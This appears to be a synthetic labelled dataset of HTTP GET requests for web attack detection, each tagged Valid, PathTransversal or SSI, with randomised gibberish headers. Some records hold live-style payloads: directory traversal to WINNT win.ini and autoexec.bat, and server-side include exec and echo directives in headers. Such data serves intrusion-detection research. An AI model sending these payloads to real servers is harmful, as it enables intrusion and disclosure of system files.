GET /sYtueqcteidxta/ciI21i7tieerrc2i/snGamiArttsnuIaosra.jpeg? HTTP/1.1
Host: www.afeh.org
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6, iso-8859-2, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.250.186.224
Cookie: enat1re=eui8o;3as0tomovnin=like0mtjo)lbrMftetboot.iniyhri;nH4ey=i@]processing-instruction? lgeorb?
Cookie2: $Version="315"
Date: Fri, 01 Dec 06 02:24:27 CET
ETag: "WiopCSRqh9ng4.5Y"
Expect: rajicDn
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Fri, 30 Jan 09 08:36:31 GMT
If-Unmodified-Since: Wed, 29 Oct 08 19:16:19 GMT
If-Match: *
If-None-Match: "zCIJ-mk0i-hliicT"
If-Range: Sat, 24 Feb 07 13:27:56 CET
Max-Forwards: 1954
MIME-Version: 3.4
Pragma: eg7pudh='pbv'
Proxy-Authorization: baAnw tvhn0r=TIoqsy
Authorization: NTLM ZTh5Zm10Y2VuZWVjY3NJcm1vbWFmaWVkbmFkc3BsRWthc2xl
Range: 518-86,86-,865-
Referer: /hrfoog/id6F1/0yrcsoad.nsf
TE: deflate,chunked;q=0.5
Trailer: If-None-Match
User-Agent: tlutitp (rX0fmee; rq0EpuyIOD)
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: FTP/6.7 www.aopsa.htm, FTP/0.5 www.ue35.css:256, FTP/0.8 171.228.40.72
Transfer-Encoding: deflate
Upgrade: yans3i/2.5
Warning: 525 2.204.107.239 "ls4rn" 
X-Forwarded-For: 185.64.155.53
X-Serial-Number: 814700
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1353
Start - Id: 45959
class: PathTransversal
GET /d6QK4/Ia0b6hj9J-E3F/sil14swjI.png?feta=nNX&gxdTeeAt=0276799773&otztpue4Kcst4os=44&Asor=o%3A%5C%5CWINNT%5C%5Cwin.ini&toti=8iTOVCpV HTTP/1.0
Host: www.lliha0l0a.cz
Connection: close
Accept: image/*, video/quicktime;q=0.9, audio/basic
Accept-Charset: *
Accept-Encoding: gzip, compress, deflate, identity;q=0.7, gzip;q=0.6
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 184.119.87.22
Cookie: 2Rxurfta=904355;SUHTiJ@=O;mZglogusrf8x= e6;ej3lwei1in=r5edalIiv7;nenIemestD=ss)
Cookie2: $Version="227"
Date: Sun, 12 Mar 06 11:39:10 GMT
ETag: "Jjb.fOTFYIJWa7Rw.4hO"
Expect: e8ch
From: uut4ote@giae.be
If-Modified-Since: Sat, 17 Jul 04 15:02:29 CET
If-Unmodified-Since: Thu, 20 Aug 09 20:19:00 CET
If-Match: "s7A8_8u@rEF8DbdjO-6F"
If-None-Match: "ZGUkLxqo-_yNjcJ"
If-Range: "V7.6KQuf0OitWReT.I"
Max-Forwards: 732
MIME-Version: 5.8
Pragma: Guo9kDi=tts9v6mr
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic aVRyc3FyZWQ6c3RhaQ==
Range: -72
Referer: /egcWPx/ahrwe.exe
TE: trailers,deflate,trailers
Trailer: If-Modified-Since
User-Agent: tn6io6p0/5.9.2
UA-CPU: x86
UA-Disp: 4049,587,8
UA-OS: FreeBSD
UA-Color: color8
Via: 2.0 166.37.220.70:5734, 6ei4/0.7 www.6ecb.jpeg, 2.8 191.130.134.234
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: seoi/9.8, kiihPn/6.7
Warning: 607 www.otrO6o.css "taqtatn4rh" 
X-Forwarded-For: 155.79.158.254
X-Serial-Number: 4946747763269
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45959
Start - Id: 39142
class: SSI
GET /rHFbshCL6n@9UEcapb_8/lz9rA6cMZIm9pEkWcs/wTN.0SK5access_logwZeF3/3xtermN/-6log9znetcat/hrjNp_doN-HeWy0y/fd_5g89rYF8/qvEl.js?ebzaqeel5rdm=stn0bu&Aolcdtteotatg=bMGJP4Uu86A&0JVhtpassqueSN4=OhaE9t HTTP/1.0
Host: 170.217.152.84
Connection: uint
Accept: */*
Accept-Charset: iso-8859-7;q=0.4, x-mac-turkish
Accept-Encoding: <!--#exec     cgi="/cgi-bin/script?eetchnacE"  -->
Accept-Language: itgixlw-ssnt, y2-iodhoew;q=0.3
Cache-Control: max-age=0605
Client-ip: 19.255.101.192
Cookie: rsgoAiEheors=984152;zaaYilrbaovxE=axk_R9kH@9;4u=tp;earrRofrem=A;tmisKc52SeH=evovohIc;mz_sw=g eahlkoiincludee
Cookie2: $Version="503"
Date: Thu, 28 Jan 10 11:55:08 GMT
ETag: W/"3lm3ehkeXKSz7_2xl@"
Expect: 100-continue
From: dwtnbtl@re8os1r5d.org
If-Modified-Since: Thu, 22 May 08 01:33:31 CET
If-Unmodified-Since: Wed, 07 Oct 09 19:35:21 GMT
If-Match: "_1X7ZDSHiRcvJKGt"
If-None-Match: *
If-Range: Mon, 19 Jun 06 14:10:15 CET
Max-Forwards: 4
Proxy-Authorization: Basic YU9tbm9yOm9uYWw=
Authorization: 4srCbj 2fS0Y=3dxIys
Range: -64430,60846-,724-19046
Referer: http://ernNlrhd.uk/iosgp3a/sedh5fa/r5hezesr/hinzgnI/er6y3.jsp
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: <!--#echo var="date_gmt"-->
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 855x947
Via: qtom/6.4 www.de8ft.tiff
Warning: 601 129.18.108.121 "hesrsMelefcoI" 
X-Forwarded-For: 112.205.75.183

null

End - Id: 39142
Start - Id: 15145
class: Valid
GET /.OM/SDnLhservices-y6style/ner/rl/ulefucedabg8c7oaer/abtbESolESrdkk/nnBeetNi6d3ejutHUi/ey/fU3Y6Ke4VdS6DO/eEda.png?hgcnTlje5lhe=edkeacos&hopt4xuNnm9=tDkYekstv&ThatOanotceNa=e%3F&wz=gmo5ZQF%40v&25xnuu=59&tfoaseretcergsj=i%28%2FsH HTTP/1.0
Host: www.rsfonfta.cz
Connection: close
Accept: application/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 0-j3kjt
Cache-Control: max-age=284
Client-ip: 243.140.49.56
Cookie: aaGdecT=et4bfteb3Iroq;7MchildHk43zL=access_log)n;lqogimotclr=1
Cookie2: $Version="60"
Date: Mon, 14 Aug 06 10:17:26 GMT
ETag: W/"gHggsPe1Z0BIBdqMIr."
Expect: vRitysc=solo;niaee7pa
From: hcaeo@Orgenr.uk
If-Modified-Since: Mon, 18 Apr 05 09:47:39 CET
If-Unmodified-Since: Wed, 10 Nov 04 17:56:06 CET
If-Match: "mHAWrzrTGC_TYOrOI.."
If-None-Match: *
If-Range: "0a7@xPvI1oipL69"
Max-Forwards: 9
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic aW1laXA6dHFmZWRhcA==
Authorization: Digest algorithm=wsteC
Range: -96,366774-,-767
Referer: /er1eWna.dll
TE: gzip;q=0.6,gzip
Trailer: User-Agent
User-Agent: Mozilla/0.5 (Machintosh; U; PPC 8.9; ey-aa; rv:7.1.1) Gecko/81580080
UA-CPU: 68000
UA-Disp: 0555,2366,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 4259x4108
Via: eatd/1.5 238.8.141.55:5500
Transfer-Encoding: identity
Upgrade: k0e/8.3, ee0yu1/6.5, csixbf/0.4
Warning: 853 www.Irfoniec.gif "balae9aEasdiral" 
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 28006910
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15145
Start - Id: 27081
class: Valid
GET /nobP/onode1l0qBg7M/p2anij48vtdsusio/d3oZhnmwC/n4ZWgK/c2aii/fSWTFVWFiCdvlP9/4L1/at.php?@aCSD4A5or2Bin=isduee-bg&impsprIwtosin0=104&srnpz=hEia&o18orhsoyoit=uHXg8G-Zcz&d5=snullelegsssafetca HTTP/1.0
Host: 112.215.39.39
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-japanese, windows-1254;q=0.9, cp-936;q=0.0
Accept-Encoding: 
Accept-Language: iE-aaso
Cache-Control: max-age=414
Client-ip: 107.98.224.64
Cookie: yJNsock_streamQDv0=tsimEdhanshttps;3riyTareEcde=326312;TvDkTS=1471392
Cookie2: $Version="392"
Date: Sat, 13 Jan 07 02:43:45 UTC
ETag: W/"GCXrnURRv_mFr6pb"
Expect: Pdooxti=q8vaaeat;es4etyb=clerresw
From: iamta@omalrTnosl.biz
If-Modified-Since: Tue, 27 Jul 04 11:39:38 GMT
If-Unmodified-Since: Fri, 22 Sep 06 08:24:19 GMT
If-Match: "HAYr8eHddyoo0ifr"
If-None-Match: *
If-Range: Fri, 14 Nov 08 22:15:00 CET
Max-Forwards: 14
MIME-Version: 3.1
Pragma: Eleeeulk=Os9role
Proxy-Authorization: Basic aGVlZW9pOnJmT2h1
Authorization: Digest uri=/shisyest/vaartoe/rinrd9ti/iaikiaa.nsf
Range: 47985-64762,7590-,13-
Referer: /atRele/i51A/sifezam/Mtohfd.asmx
TE: chunked;q=0.7,deflate;q=0.4
Trailer: Accept-Charset
User-Agent: ntnidlDonbheetone
UA-CPU: Sparc
UA-Disp: 3070,8448,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8685x992
Via: 6.1 www.rAatjh0.jpg, FTP/0.0 249.157.28.19
Transfer-Encoding: tjeeie
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 122 www.yssacdsa.gif "Acidea" "Thu, 21 Jan 10 17:16:57 CET"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27081
Start - Id: 16060
class: Valid
GET /R-500tGvnqzT/ozhcrtoei/eEpegn0vcoNjlyhocers/dl/lY2ESRAuJ_q3D/CGujJxK/te-/PuxSrOhttp1z/eitihtii3l/lrz72c_/tqXX65.cgi?ihroNchkesl=nh7NBvn1L6&iunneim0ndae=eTmvuTUi&s3onin=+mf%3C&l5meedalRhuXdi=tjwr++ovsr4libh&htaoq=Edeleteiframetede3t4tsd%29+ HTTP/1.1
Host: 177.19.239.222
Connection: keep-alive
Accept: video/mpeg;q=0.5
Accept-Charset: ks_c_5601-1987, iso-8859-9, iso-8859-5
Accept-Encoding: gzip;q=0.6, identity, compress, gzip
Accept-Language: baHdm-ctasl7dN;q=0.8, e-e0alm;q=0.6
Cache-Control: max-stale
Client-ip: 139.53.120.102
Cookie: 3ee7atcu=n;Jn420aO2c5EE=totmo@Fi;DKE3=5278
Cookie2: $Version="7"
Date: Mon, 14 May 07 24:04:17 GMT
ETag: "TAeqn8RuxKncBO-M7gv"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Sun, 23 Oct 05 15:23:42 UTC
If-Unmodified-Since: Sat, 13 Sep 08 06:02:17 UTC
If-Match: *
If-None-Match: "bj9AHG6gYP3Whdu42PKi"
If-Range: "ZVtje-NUYzFcq321m7q"
Max-Forwards: 38
MIME-Version: 5.7
Pragma: thrc=l
Proxy-Authorization: Digest opaque="neh7g"
Authorization: vimeh7 RSprR9e=6cnYteum
Range: 027-,-7
Referer: http://mniv.st/lacs/daeae.dll
TE: trailers
Trailer: Via
User-Agent: riuandedh/7.1.7
UA-CPU: MIPS
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 973x791
Via: HTTP/7.6 www.hat1aax.htm, FTP/0.5 151.211.145.101:48
Transfer-Encoding: he6ww; sjigfccs=o6dnt
Upgrade: erd2c/3.3, ohn/2.9
Warning: 434 21.156.106.72 "eo6ow" "Fri, 28 Oct 05 11:38:33 CET"
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 552884692848315440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16060
Start - Id: 27618
class: Valid
GET /vpoRoh.sh?adeltMO=5laateqsr&BVAXipositionLMheYB=02&fafak7adopr=aCF%40N&w1hceip=rnq5dAtivexe&3e4u9raideh=mailrperlt&lovpse32tpj=ft%7ElinkoiO&3rrstaror=ig%3F3o7ohavingjr&sd5itbnntatd=r HTTP/1.1
Host: 79.112.49.190:3711
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 60.217.205.251
Cookie: tsseouu=885;s4srnOe2maEtj1=71;Mamisscm=uFUwtILhO;replaceopenLMwp8=gk
Cookie2: $Version="35"
Date: Tue, 11 Sep 07 04:46:28 UTC
ETag: W/"Q7FDirU-IyamM8-k"
Expect: 100-continue
From: 06wy8l@mtedC.de
If-Modified-Since: Sat, 08 Aug 09 11:21:55 GMT
If-Unmodified-Since: Sat, 30 Jul 05 16:51:04 CET
If-Match: "sskGDEsTKTMV-_leKUC"
If-None-Match: "VNjkmdpWGkuqy4k06l6t"
If-Range: ".hZ53Z@.cCKqFKKodVbK"
Max-Forwards: 0
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Susn wVBdeE=neSgPhy
Authorization: NTLM YmJudGR0bGVhd1lpb3dpaDh0YjFzTHVzZWd1ZWhScHRsOHNuYW4=
Range: 0-4
Referer: /ztdtooD/1hofO/t3eIte/iswiai/yhra.exe
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: Mozilla/2.6 (compatible; sfaaE; Open BSD i386; dDvaL)
UA-CPU: x86
UA-Disp: 368,095,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 794x6621
Via: FTP/4.2 38.118.205.129, 8.0 www.eqds.tiff:5925
Transfer-Encoding: compress
Upgrade: iro/0.9, dcset/6.0, xNs9ee/6.4, 9eaii/4.5, msw/6.6
Warning: 741 www.rweia.css "ro7ottxtixwG8b2" "Mon, 03 Nov 08 11:02:06 CET"
X-Forwarded-For: 177.184.78.1
X-Serial-Number: 189697977036477
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27618
Start - Id: 9538
class: Valid
GET /mt70xuIRN3WHdl/7ziajhw/yh/qQJ@7/e6YLQOzBX79T88bKjB/y79me4X.s8.html?ihbnbtpoccOhc=1RjDPwn4k78&Rbeu=tle&aHpim4Di2cn=sqlJF%40n HTTP/1.1
Host: 123.11.8.51
Connection: keep-alive
Accept: image/*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: hoerfoae-u, edbxtaiv-sa
Cache-Control: no-cache
Client-ip: 228.107.242.191
Cookie: ubsksr=ibi'cadd- jorfl;aosoadaRdee2=0;notisedcb1oere=mb0vs;dewzmkah3be=01
Cookie2: $Version="430"
Date: Mon, 08 Mar 10 14:50:30 CET
ETag: W/"@ooEB@uaCNN9tFEzz0"
Expect: HoueTiw
From: anp51@cLdyyihltw.st
If-Modified-Since: Wed, 01 Dec 04 16:09:33 UTC
If-Unmodified-Since: Tue, 15 Jan 08 14:32:09 GMT
If-Match: "Xi8mJP0f5-KPVFjWZKN5"
If-None-Match: *
If-Range: Thu, 20 Dec 07 13:11:21 GMT
Max-Forwards: 89
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://wotOwyth.de/SaOoudi/Oooe/hwdos4ni/0vrssema/4mBs.php4
Authorization: Basic b29qdE5qdDo1c0VpRWk=
Range: -473707,-784763,883586-54671
Referer: http://nessu9.it/iieoi/meiesa.htm
TE: chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/0.1 (X11; U; Linux i386 1.1; 7u-s1; rv:1.6.4) Gecko/69584263
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1124x1179
Via: 5.4 33.154.24.238:2
Transfer-Encoding: gzip
Upgrade: zZr/7.6, ri9ps3/0.6
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 107.141.77.183
X-Serial-Number: 2426894
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9538
Start - Id: 30765
class: Valid
GET /l0/6p/engmFftpstyleunionuOL/rynnsl/1Vwv@Rq3/tihirsatahLttsh/eec3gofbrp0gilxylnam/oWGBQC/saeieoaBsr1etve2rpti/NheJ/8_o/brrnannntwjshmt.htm? HTTP/1.1
Host: 83.243.112.88
Connection: close
Accept: application/zip
Accept-Charset: x-mac-arabic;q=0.0, x-mac-greek;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: ti-Vx, iommos-wallc2p, a4c7o9-Dn;q=0.5, wuea-tcraeuha, dR6r-r0;q=0.8
Cache-Control: max-stale
Client-ip: 230.11.255.176
Cookie: ratpfya6gg=aCntoim<oe70bzaqfe;eoHe1mchpS=7914;ojtfzq1s=3619031277;iroaterGlcSD=evari&tAuoexecc
Cookie2: $Version="8"
Date: Sun, 24 Jun 07 04:06:29 UTC
ETag: "kCIPstooR2FZMlPLQ"
Expect: dhOtrocf=8trheo;f7rimsn
From: dzpsof6@gehphe0eb.biz
If-Modified-Since: Thu, 10 Sep 09 11:38:53 GMT
If-Unmodified-Since: Mon, 09 Jan 06 24:23:23 UTC
If-Match: "CsGAiHR322yK7W2um3"
If-None-Match: "4Ngv3vpacdnDbDljZlm"
If-Range: Sat, 10 Oct 09 14:28:38 UTC
Max-Forwards: 13
MIME-Version: 2.5
Pragma: teefmnh='asnn6ds'
Proxy-Authorization: ieatc4 rnrbw=hcadA
Authorization: NTLM alVsblN5bXRkcmVvbXJlZmVuSXV1YWloZW90dXF0ZWJjaWRkbmNo
Range: 145-,977-10
Referer: /nt3ea/eeushf3/i9easp6m.dll
TE: trailers
Trailer: TE
User-Agent: kayqa/2.1
UA-CPU: 68000
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9905x3128
Via: 6.8 www.b75l.html, HTTP/1.5 www.n8yuunE2.gif
Transfer-Encoding: weNi
Upgrade: ty9fte/7.4, hoCnM/8.7
Warning: 228 www.bfenm.gif "bhintfrpnveP" "Sun, 06 Aug 06 02:21:34 GMT"
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 14459
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30765
Start - Id: 18167
class: Valid
GET /du6oLneaE/ff9aoism3c/tb0eberaitdmp5ns.php?leInr=oe%5D&nnidsnirtzoHHr=42&lbc30tb7rntrr=nWoeyhehtnreu7elh&sock_streamk9VnullgbqgX0=aog+&c2PlO6p5M=ttuigtio8k&tHeicoh=76929845&reuaadtha=aigeAq6f7&HYaGxKWXYH5=ttmppibide&et5ctaim24=e6a9a&6se8tkwslrgetrk=616980913&ya1vlydAeSeepea=%25+so&tomft=286543 HTTP/1.1
Host: www.t7ai.be
Connection: close
Accept: video/*, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: na4pcs-StegEo
Cache-Control: no-cache
Client-ip: 92.240.220.157
Cookie: Aitmaadese3pai=uslm8atl
Cookie2: $Version="658"
Date: Sun, 28 Mar 10 15:14:25 GMT
ETag: W/"9U2ZAnylyXyu8AzjCNj"
Expect: 100-continue
From: yittatl@e4xka.be
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Tue, 18 May 04 10:53:29 CET
If-Match: "g.hOfGIIWeYu4rknWb"
If-None-Match: "9mG6SlSl9c0FidRcBi@"
If-Range: "MG.fA3BJAOD7N.nJKQrW"
Max-Forwards: 122
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM bzJuTGVlaVducmxpbXNhc21OdGU1bEZsaWF0dGVlam9ydw==
Authorization: Digest nonce
Range: 875436-348852,-818
Referer: http://s0RrPnat.com/uAiteht/rvbE.php3
TE: deflate,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 8.3; 2t-it; rv:1.6.2) Gecko/86588600
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3922x0648
Via: FTP/1.3 www.alNreroo.js:553, ksa/4.1 6.205.53.24, 8.7 141.19.85.181
Transfer-Encoding: neehae; no0nen=ATiwlds
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18167
Start - Id: 572
class: Valid
GET /n40_P5CoU/fArmERZa0QC/tefbt/t10_Hq3I1holdwLwk.swf? HTTP/1.1
Host: 107.68.54.140:35
Connection: close
Accept: audio/x-wav, text/html;q=0.8, application/*
Accept-Charset: x-mac-turkish
Accept-Encoding: compress, deflate;q=0.2, gzip, identity
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 149.215.56.244
Cookie: Jce6anWbrf=yhmai sbdune9x:;H9eLyrTsi=3;lJO6rMjS8OrI=ei
Cookie2: $Version="8"
Date: Sat, 24 Sep 05 20:04:24 CET
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 100-continue
From: nsineld@Rnhcetdcc.uk
If-Modified-Since: Sat, 21 Jan 06 08:08:20 CET
If-Unmodified-Since: Fri, 12 Jun 09 22:56:15 CET
If-Match: "-V8kghd_xTzratK_J0"
If-None-Match: "t6T1cMP8ohKCSMlJSQDM"
If-Range: Fri, 29 Jul 05 17:04:04 CET
Max-Forwards: 03
MIME-Version: 4.0
Pragma: tep='8nO'
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: ooer arxl=7xVfetts
Range: 31686-
Referer: http://aser0klL.biz/rdffdcob/enic6/doai/rsro.tar
TE: deflate,gzip
Trailer: If-Modified-Since
User-Agent: eeneT766lepicsse
UA-CPU: MIPS
UA-Disp: 7728,139,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: 2.7 www.a9of.gif, HTTP/8.4 111.243.249.230
Transfer-Encoding: gzip
Upgrade: geg/6.2
Warning: 107 www.ojbehoq.css "igabo" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 602347866565729
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 572
Start - Id: 27680
class: Valid
GET /0g/euPHq2j6k/oKGGNb.pl?replaceQJ4.Me=twaZihlibehtlss%7Cn&lersndihb3ame=Ezutreytzss6oa&tCeesns=nbnasnu&tdtAtnp=xn%3Fua%28w3ioeem07go%5CincludeN&gzohtVea=nlc&1EeodRealah=rleio HTTP/1.0
Host: 23.249.134.140:80
Connection: bqhaezm
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate, compress;q=0.7, identity;q=0.1
Accept-Language: cresiuLh-tEi
Cache-Control: max-age=949
Client-ip: 239.27.124.13
Cookie: jh03Rmias=9209;3i=RlogAgtcl;.M@jTWOgLqV=sn
Cookie2: $Version="690"
Date: Sat, 26 Jul 08 18:37:53 CET
ETag: ".0HZLsvWECLFYqDWWN.f"
Expect: 100-continue
From: drguoece@vffbtwio.it
If-Modified-Since: Sun, 22 Feb 09 14:00:52 UTC
If-Unmodified-Since: Sun, 14 Jan 07 13:25:19 GMT
If-Match: *
If-None-Match: *
If-Range: "aBeN1gVOJx96-ID"
Max-Forwards: 46
MIME-Version: 9.8
Pragma: muynce5='dnSo'
Proxy-Authorization: Digest cnonce="2Esho"
Authorization: NTLM ZWRvZWRpbnljc3RsT29tRHNlR2Rob2lwYWhycHJJdXR0cHRpc2NlOW9lc2Vl
Range: 89-43182
Referer: /llascnn/i6mt/5ruxas/t9tsn.zip
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: stia1I/0.6.1.5.6
UA-CPU: 68000
UA-Disp: 408,9856,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1357x8118
Via: 7.7 144.128.140.119
Transfer-Encoding: identity
Upgrade: fplbe/4.0, d0U/8.1, tbez1/9.2, tmorf/3.1, obhnA/2.1
Warning: 161 www.eeLnseL.png "oeanonaeowoFisdeitn" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27680
Start - Id: 45442
class: PathTransversal
GET /tAJsPlwiohAALzPzB/ipG@vIdBzzdxc7jc4W/MecgaNTatwensteOl/s-f@ZHE2Y_y/uJjAQ/m2c6p9JHXrTYK/5pk5FigweJEE0.jsp?nehtft4ncahad=4&sfeov6e3=ynsl%2B&des8e1vie=OTzyeL9eht&bsheebt=syp&Hoio=%3A&eakesEn7e=eande&wi=sgP&sANeedeehotd=x4cpk8&YAJKBsselectB=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat&sSwUJuKJadmint=0769204&T4orr=5en195&9Mn53CiA2LM=bbgsound HTTP/1.1
Host: www.4rclir6nf.biz
Connection: esttoeo
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: jemsAy-4t;q=0.9, uidh9q-v
Cookie2: $Version="76"
Date: Mon, 09 Mar 09 06:51:26 CET
If-Range: Tue, 11 Aug 09 12:02:05 CET
Pragma: m='rhhhiau'
Referer: /dsmcn/ymeUg/snd7aes/ab66wzAw/huidimnt.php4
User-Agent: Mozilla/9.9 (compatible; hutscrBL; Linux i386; G8hc; taWeste; mrnebosl)

null

End - Id: 45442
Start - Id: 12263
class: Valid
GET /d53dfmzun8DX/VYIfIKMVuq/abZcGohThtpasssMstdiny/ftcgt/qcNestdinrshutdown3C/dmna.shtml?rfsrlneeengiai=+asmr%25mocha%25hearl&he=olycopyE&enfcmrntprhaise=lzoeb5&cr=oJcsdETwi8&aie=rUGwk0hu&h01clrbdlLa=Efetd4eThmeopson HTTP/1.1
Host: www.snanhirt.cz:80
Connection: keep-alive
Accept: audio/basic;q=0.8
Accept-Charset: x-mac-arabic;q=0.3, koi8;q=0.5, big5;q=0.1, euc-jp
Accept-Encoding: *;q=0.6
Accept-Language: t3lt-hvi
Cache-Control: min-fresh=27
Client-ip: 170.207.96.98
Cookie: uGc4wuA2e5iiig=2at:jat;kdeleteIw=aegVeae
Cookie2: $Version="853"
Date: Mon, 19 Jan 09 03:32:18 UTC
ETag: W/"mIUxCyMzeuK-c5W_P7"
Expect: ensp=enm8Tl
From: ihu03@addugo.com
If-Modified-Since: Mon, 18 Aug 08 14:35:41 GMT
If-Unmodified-Since: Wed, 21 Apr 04 16:25:40 UTC
If-Match: "ryrsy0VxIaVQ375KMP8"
If-None-Match: "NhFN7QUJMHCe.wh1ieRy"
If-Range: *
Max-Forwards: 434
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: NTLM ZG50dHJ2ZGhhaWF1ZWFiZG5Jd3Bhc2VPb1R3aGNub2VuYXNvRWlkbHJ3Y3NucA==
Authorization: sov0 isUym4=eOnj
Range: 9688-4015,-4,45-
Referer: /mtl7wR/wonv4e/Uwida/esst/6eio.dll
TE: trailers,chunked;q=0.7
Trailer: Range
User-Agent: eoya (qccyXigCrO; r.uAuY6t)
UA-CPU: MIPS
UA-Disp: 689,5553,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7901x792
Via: HTTP/8.4 4.124.111.193
Transfer-Encoding: identity
Upgrade: llr/1.5, sS4lb9/2.2, sr7wD/6.1, so4i/0.5
Warning: 801 56.160.18.152 "x1hi" "Mon, 01 Dec 08 03:48:59 UTC"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12263
Start - Id: 3782
class: Valid
GET /4tdhhstmnsvbtb0tnu/hhcITLGbe6phf1P/hT/fj/a6erettsehoairQtra/t4BStlk_DzgPxp/ugrhaerys/tesacblh/YmH5FnodeFvE_sMMO.jsp?o6OaLndknreoe=f7maziruenle&9lpXg7=%3Dusroe++nxaoipq%3A&dE00fxlqdV=supuaul&mTt6LstyleA4@telnetg=ruoY%40at5gwhwindow.open8lps&wlUq1gzltnitwA=ue0a3w%2B%3A&Wjexec1gcati=513506&tleoo=w%27tKcatstdinas&usetgsHzs=4485&re=h9staadminmd HTTP/1.0
Host: 245.225.54.24
Connection: ko4t4be
Accept: application/x-tar;q=0.4
Accept-Charset: iso-8859-4, x-mac-chinesetrad, cp-932;q=0.5, big5
Accept-Encoding: *;q=0.8
Accept-Language: Acddeert-di, d8oNd-puo3ST9;q=0.1, dHnadeh-rvEkt
Cache-Control: no-cache
Client-ip: 124.219.109.101
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="347"
Date: Sun, 13 Aug 06 15:43:35 CET
ETag: W/"Cw5CBzPYBcAwz@Gj"
Expect: 100-continue
From: ooos@sar1.com
If-Modified-Since: Tue, 05 Apr 05 01:20:47 CET
If-Unmodified-Since: Tue, 16 Oct 07 10:11:58 GMT
If-Match: "UHSY@5JuHZd-uhCNX.4"
If-None-Match: *
If-Range: Fri, 17 Dec 04 14:34:29 UTC
Max-Forwards: 9143
